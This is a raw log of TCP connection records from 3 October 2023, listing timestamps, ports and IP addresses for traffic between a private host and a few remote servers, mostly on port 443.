Oct 3, 2023 22:36:58.731611013 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731622934 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731729984 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731744051 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731842995 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731853008 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731966019 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731981039 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.153449059 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.153650045 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.153712988 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:59.154086113 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:59.156256914 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.156438112 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.156508923 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:59.156748056 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:59.556088924 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.556185007 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:59.556372881 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:59.556687117 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:15.535207033 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:37:33.410375118 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.410463095 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.410557985 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.411417961 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.411511898 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.411587000 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.413640976 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.413664103 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.413680077 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.413698912 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.559904099 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:33.559987068 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:33.560094118 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:33.560671091 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:33.560703993 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:33.641654968 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.645216942 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.645296097 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.647085905 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.649074078 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.649101973 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.770344973 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:33.772542953 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:33.772586107 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:33.866466045 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.867089987 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.867114067 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.877499104 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:33.877785921 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:33.877847910 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:34.000987053 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.001539946 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.001586914 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.001651049 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.001669884 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.001805067 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.001822948 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.002023935 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.002041101 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.002151966 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.002170086 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.002363920 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.002382994 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.002551079 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.002571106 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.002682924 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.002700090 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.209172964 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:34.209270954 CEST	443	49882	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:34.209462881 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:34.209995031 CEST	49882	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:34.309334040 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:34.309427977 CEST	443	49881	104.21.88.34	192.168.2.4
Oct 3, 2023 22:37:34.309478998 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:34.309874058 CEST	49881	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:37:34.310542107 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:34.310750008 CEST	443	49883	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:34.310914993 CEST	49883	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.698513985 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.698597908 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:35.698712111 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.699424982 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.699461937 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:35.808940887 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.809005022 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:35.809108019 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.809786081 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.809820890 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:35.907815933 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:35.909845114 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:35.909920931 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.016799927 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.018923044 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.018984079 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.138214111 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.138750076 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.138813019 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.247045994 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.251286983 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.251384020 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.254920959 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.255017996 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.258800030 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.258824110 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.262778044 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.262798071 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.617230892 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.617440939 CEST	443	49884	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:36.617594004 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:36.618041039 CEST	49884	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:37.080811024 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:37.080985069 CEST	443	49885	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:37.081248999 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:37.081645966 CEST	49885	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.384071112 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.384111881 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.384196043 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.384227037 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.384239912 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.384304047 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.385642052 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.385658979 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.386056900 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.386077881 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.386666059 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.386755943 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.386841059 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.387995958 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.388031960 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.600295067 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.603177071 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.603193998 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.630064011 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.632318974 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.632349014 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.634500980 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.636678934 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.636702061 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.830905914 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.831516981 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.831563950 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.859741926 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.862067938 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.862679958 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.862724066 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.863013029 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.863110065 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.866746902 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.866836071 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.869448900 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.869507074 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.873334885 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.873385906 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:41.873415947 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:41.873434067 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:42.261567116 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:42.261755943 CEST	443	49887	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:42.261962891 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:42.262180090 CEST	49887	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:42.264292955 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:42.264580011 CEST	443	49888	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:42.264667034 CEST	49888	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:42.264774084 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:42.265130997 CEST	443	49889	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:42.265254974 CEST	49889	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345433950 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345478058 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.345515966 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345526934 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345550060 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345557928 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.345598936 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.345627069 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.345671892 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.346067905 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.346079111 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.346116066 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.346151114 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.346654892 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.346677065 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.576406956 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.576493979 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.578527927 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.578536034 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.579029083 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.580780029 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.585124969 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.585362911 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.589251995 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.589498997 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.594670057 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.594692945 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.595159054 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.595201969 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.595232964 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.595652103 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.597134113 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.597687960 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.622533083 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.638449907 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.638485909 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.805651903 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.805951118 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.805963039 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.809617043 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.810883045 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.810911894 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.817854881 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818262100 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818330050 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818480968 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818507910 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818526983 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818542957 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818589926 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818605900 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818686962 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818800926 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818849087 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.818866968 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.818975925 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.819016933 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:43.819087029 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:43.819102049 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.239727974 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.239842892 CEST	443	49891	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.239907980 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:44.240411997 CEST	49891	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:44.245369911 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.245470047 CEST	443	49890	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.245541096 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:44.245855093 CEST	49890	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:44.651118040 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.651243925 CEST	443	49892	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:44.651310921 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:44.651597977 CEST	49892	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737765074 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737768888 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737839937 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:56.737843990 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:56.737857103 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737904072 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:56.737912893 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737947941 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.737962961 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.738387108 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.738424063 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:56.738461018 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.738487005 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:56.738506079 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:56.738529921 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.000013113 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.000118017 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.001359940 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.001378059 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.001977921 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.003161907 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.016669035 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.016776085 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.017117023 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.017290115 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.018106937 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.018115997 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.018412113 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.018420935 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.018517971 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.018904924 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.019555092 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.019891977 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.046462059 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.062448978 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.062468052 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.205106020 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.206926107 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.206947088 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.224589109 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.227025032 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.227056026 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.228470087 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.228585005 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.228610039 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.228677034 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.228693962 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.228764057 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.228792906 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.230732918 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.230755091 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.646255970 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.646400928 CEST	443	49893	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.646711111 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.648686886 CEST	49893	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.680774927 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.680869102 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.681217909 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.681229115 CEST	443	49894	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:57.681240082 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:57.681296110 CEST	49894	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.049346924 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.049443960 CEST	443	49895	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.049504042 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.049890041 CEST	49895	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.118611097 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.118660927 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.118716002 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.118731976 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.118762970 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.118822098 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119050980 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119066954 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.119199991 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119220018 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.119422913 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119505882 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.119586945 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119823933 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.119862080 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.395726919 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.395869017 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.395895004 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.397742033 CEST	49897	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.397811890 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.397825003 CEST	443	49897	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.397897005 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.398572922 CEST	49896	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.398597956 CEST	443	49896	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.590131044 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.590594053 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.590682983 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.590848923 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.590892076 CEST	443	49898	172.67.150.79	192.168.2.4
Oct 3, 2023 22:37:58.590970993 CEST	49898	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:37:58.590989113 CEST	443	49898	172.67.150.79	192.168.2.4
